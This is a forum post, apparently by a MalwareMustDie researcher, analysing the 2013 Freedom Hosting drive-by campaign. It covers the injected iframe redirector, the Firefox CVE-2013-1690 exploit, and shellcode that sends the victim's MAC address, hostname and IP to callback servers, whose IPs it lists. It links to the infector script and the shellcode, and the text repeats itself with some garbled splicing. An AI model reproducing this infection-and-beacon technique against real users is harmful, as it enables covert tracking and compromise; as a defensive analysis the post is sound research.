Background:
This is purely a case of state sponsored case malware, it was search warrant backing up the domain name spotted to be infected.
Infection runs in Onionland on FreeHosting website(s) in 2013, with the purpose to aim child porn suspects with the method of mass-driven by download. The court documentation was spotted recently in 2014 to legitimate the usage of mass-infection technique for the purpose to search (investigation details) by the regular search warrant signed by district court of Nebraska, US.
Details of malware, its distribution & purpose:
1. These are the variant of codes implemented to infect, injected in the Freedom Hosting site in some pages, are the malicious Javascript Iframer, w/condition aimed are Firefox (browser) and Windows/NT (OS), noted the cookie method used and the callback.
http://pastebin.com/bu2Ya0n6
2. One of the above codes is redirecting visitor to specific .onion "infector" site stated in above point (1), using malicious onfuscated Javascript to exploit the (at that time) vulnerable version of Firefox with 0day CVE-2013-1690 in order to infect the payload (a shellcode) to , while one of the codes were sending beacon for the infection initiation to:
3. The above obfuscated Javascript (2), was exploiting Firefox (that time's) 0day to gain arbitrary permission to execute malicious shellcode (under environment Win x32 ) to perform the malicious verdict as per following details, and here is the analysis of the shellcode using radare as per snipped in the pic below.
The 0day exploitation can be viewed by the below reference and not a subject to be discussed:
https://cve.mitre.org/cgi-bin/cvename.c ... -2013-1690
https://bugzilla.mozilla.org/show_bug.cgi?id=901365
https://www.mozilla.org/security/announ ... 13-53.html
The shellcode analysis can be viewed here: http://pastebin.com/aFUP2gLB following by the behavior test to confirm the reversed information, to avoid false positive in verdict.
4. With the method of (1) Crafting shellcode into exe + run it and (2) simulation of infection with the Firefox Tor Bundled, can positively reproduced the CNC callback as per snapshot below:
With calling to the neighbor IP of the callback IP stated above to the ghost network of:
The malicious hidden IFRAME redirector driven by javascript, which are implemented in some pages under the Freedom Hosting site in a Tor network (together with the same server as TorMail), is redirecting users matching to criteria Windows OS and Firefox browser to the callback IP or specific .onion domain to 0day exploit (CVE-2013-1690) and executing shellcode as the payload. The shellcode is sending HTTP/1.1 GET request contains specific URL with the TCP/IP packet that contains IP address and MacAddress of the infected PC. MacAddress which was grabbed by SendARP@IPHLPAPI.DLL and Hostname of infected PC grabbed by gethostbyname@WS2_32.DLL and gethostname@WS2_32.DLL in the shellcode, are sensitive unique information which needed to have a consent from the user for being sent to the remote environment, was sent.
The cookie was installed in the PCs accessing the Freedom Hosting sites, to be used for tracking scheme to match the redirected user status, was installed in PC that matched criteria described in point (1).
6. The privacy violation verdict:
After thorough investigation performed, beyond any doubt we confirmed that sensitive information (READ: PRIVACY) of multinational users can be violated by the implementation of this malware for legal investigation, in this specific case we can confirm the following violation points:
(1) Silently sending infected PC hostname,
(2) Silently sending MacAddress (attached TCP packet) and ARP
(3) IP address is sent to this remote host. ..w/o proper mention
(4) The cookie which was silently installed in infected PC can be use for tracking purpose.
7. Sample
The payload is the shellcode binary hex file, we uploaded into VT here: Payload is the shellcode, sample:
VT: https://www.virustotal.com/en/file/7441 ... 380104138/
With the detection ratio of 2/48, the file was uploaded by another researcher individual we did not know beforehand with the same hash.
For the share to the members in KM, we uploaded the samples of shellcode + crafted EXE samples.
8. The point of this report:
The point of this report is to clarify the real fact. For you to see & judge yourself as fellow malware researchers whether the usage of such mass-infected malicious can be allowed morally, or not. Once we let it happen, this method is undoubtedly will be re-used, over and over and over again, and encourage other country to do the same too, with opening the possibility that someday we we may face a wild wild west internet in the future where good people, cops and crooks are all using malware to battle each other..
Malware is bad by default and nature, it was built basically by the concept of infects-duplicates-steals-control-destroy victims, is a subject to be avoided by the good fellow. There is no one-country's law ever "enough" to allow the mass-multinational infection of it, to whatever reason.
Due to this, we MMD protesting the usage of this malware, as per posted here, as the background information: http://blog.malwaremustdie.org/2014/08/ ... d-any.html
9. Reference:
https://www.documentcloud.org/documents ... davit.html
http://www.wired.com/2014/08/operation_torpedo/
http://reason.com/blog/2014/08/06/fbi-t ... -tor-users
http://www.wowt.com/home/headlines/Fed- ... 16621.html
http://www.wired.com/2013/08/freedom-hosting/
http://xerocrypt.wordpress.com/2013/08/ ... ghty-list/
https://www.virusbtn.com/blog/2013/08_05.xml
https://krebsonsecurity.com/2013/08/fir ... porn-hunt/
https://blog.torproject.org/blog/hidden ... om-hosting
Thank you for the kindly read this report. This is the work of team effort, not individual. not only MMD.
I did the analysis of the shellcode parts (pastebin point 3), and compiling the overall evidence.
There are so many reference I picked the closest to the source, which using strict filter since the infection was realized in mid 2013, and some objects were deleted from internet.
What's bad is just bad, and malware is bad. Don't use it, there will always be more damage than good points.
Best regards
#MalwareMustDie - KernelMode rocks!
This is purely a case of state sponsored case malware, it was search warrant backing up the domain name spotted to be infected.
Infection runs in Onionland on FreeHosting website(s) in 2013, with the purpose to aim child porn suspects with the method of mass-driven by download. The court documentation was spotted recently in 2014 to legitimate the usage of mass-infection technique for the purpose to search (investigation details) by the regular search warrant signed by district court of Nebraska, US.
Details of malware, its distribution & purpose:
1. These are the variant of codes implemented to infect, injected in the Freedom Hosting site in some pages, are the malicious Javascript Iframer, w/condition aimed are Firefox (browser) and Windows/NT (OS), noted the cookie method used and the callback.
http://pastebin.com/bu2Ya0n6
2. One of the above codes is redirecting visitor to specific .onion "infector" site stated in above point (1), using malicious onfuscated Javascript to exploit the (at that time) vulnerable version of Firefox with 0day CVE-2013-1690 in order to infect the payload (a shellcode) to , while one of the codes were sending beacon for the infection initiation to:
Code: Select all
The infector script w/ some debfuscation we researched in here: http://pastebin.com/RTwsyrH8 IP Address: 65.222.202.53
City: Triadelphia
State or Region: West Virginia
Country: United States
ISP: Verizon Business
Latitude & Longitude: 40.0900-80.6220
Domain: verizonbusiness.com
ZIP Code: 260593. The above obfuscated Javascript (2), was exploiting Firefox (that time's) 0day to gain arbitrary permission to execute malicious shellcode (under environment Win x32 ) to perform the malicious verdict as per following details, and here is the analysis of the shellcode using radare as per snipped in the pic below.
The 0day exploitation can be viewed by the below reference and not a subject to be discussed:
https://cve.mitre.org/cgi-bin/cvename.c ... -2013-1690
https://bugzilla.mozilla.org/show_bug.cgi?id=901365
https://www.mozilla.org/security/announ ... 13-53.html
The shellcode analysis can be viewed here: http://pastebin.com/aFUP2gLB following by the behavior test to confirm the reversed information, to avoid false positive in verdict.
4. With the method of (1) Crafting shellcode into exe + run it and (2) simulation of infection with the Firefox Tor Bundled, can positively reproduced the CNC callback as per snapshot below:
With calling to the neighbor IP of the callback IP stated above to the ghost network of:
Code: Select all
5. The malicious activity verdict:65.222.202.54 ASN: 701 / UUNET
Prefix: 65.192.0.0/11
Vienna, Virginia, United States, North America
38.9012,-77.2653 Verizon BusinessThe malicious hidden IFRAME redirector driven by javascript, which are implemented in some pages under the Freedom Hosting site in a Tor network (together with the same server as TorMail), is redirecting users matching to criteria Windows OS and Firefox browser to the callback IP or specific .onion domain to 0day exploit (CVE-2013-1690) and executing shellcode as the payload. The shellcode is sending HTTP/1.1 GET request contains specific URL with the TCP/IP packet that contains IP address and MacAddress of the infected PC. MacAddress which was grabbed by SendARP@IPHLPAPI.DLL and Hostname of infected PC grabbed by gethostbyname@WS2_32.DLL and gethostname@WS2_32.DLL in the shellcode, are sensitive unique information which needed to have a consent from the user for being sent to the remote environment, was sent.
The cookie was installed in the PCs accessing the Freedom Hosting sites, to be used for tracking scheme to match the redirected user status, was installed in PC that matched criteria described in point (1).
6. The privacy violation verdict:
After thorough investigation performed, beyond any doubt we confirmed that sensitive information (READ: PRIVACY) of multinational users can be violated by the implementation of this malware for legal investigation, in this specific case we can confirm the following violation points:
(1) Silently sending infected PC hostname,
(2) Silently sending MacAddress (attached TCP packet) and ARP
(3) IP address is sent to this remote host. ..w/o proper mention
(4) The cookie which was silently installed in infected PC can be use for tracking purpose.
7. Sample
The payload is the shellcode binary hex file, we uploaded into VT here: Payload is the shellcode, sample:
VT: https://www.virustotal.com/en/file/7441 ... 380104138/
With the detection ratio of 2/48, the file was uploaded by another researcher individual we did not know beforehand with the same hash.
For the share to the members in KM, we uploaded the samples of shellcode + crafted EXE samples.
8. The point of this report:
The point of this report is to clarify the real fact. For you to see & judge yourself as fellow malware researchers whether the usage of such mass-infected malicious can be allowed morally, or not. Once we let it happen, this method is undoubtedly will be re-used, over and over and over again, and encourage other country to do the same too, with opening the possibility that someday we we may face a wild wild west internet in the future where good people, cops and crooks are all using malware to battle each other..
Malware is bad by default and nature, it was built basically by the concept of infects-duplicates-steals-control-destroy victims, is a subject to be avoided by the good fellow. There is no one-country's law ever "enough" to allow the mass-multinational infection of it, to whatever reason.
Due to this, we MMD protesting the usage of this malware, as per posted here, as the background information: http://blog.malwaremustdie.org/2014/08/ ... d-any.html
9. Reference:
https://www.documentcloud.org/documents ... davit.html
http://www.wired.com/2014/08/operation_torpedo/
http://reason.com/blog/2014/08/06/fbi-t ... -tor-users
http://www.wowt.com/home/headlines/Fed- ... 16621.html
http://www.wired.com/2013/08/freedom-hosting/
http://xerocrypt.wordpress.com/2013/08/ ... ghty-list/
https://www.virusbtn.com/blog/2013/08_05.xml
https://krebsonsecurity.com/2013/08/fir ... porn-hunt/
https://blog.torproject.org/blog/hidden ... om-hosting
Thank you for the kindly read this report. This is the work of team effort, not individual. not only MMD.
I did the analysis of the shellcode parts (pastebin point 3), and compiling the overall evidence.
There are so many reference I picked the closest to the source, which using strict filter since the infection was realized in mid 2013, and some objects were deleted from internet.
What's bad is just bad, and malware is bad. Don't use it, there will always be more damage than good points.
Best regards
#MalwareMustDie - KernelMode rocks!
Attachments
RAR5, password: infected
Noted: Sample is shared to KM community
(1.89 KiB) Downloaded 63 times
Noted: Sample is shared to KM community
(1.89 KiB) Downloaded 63 times
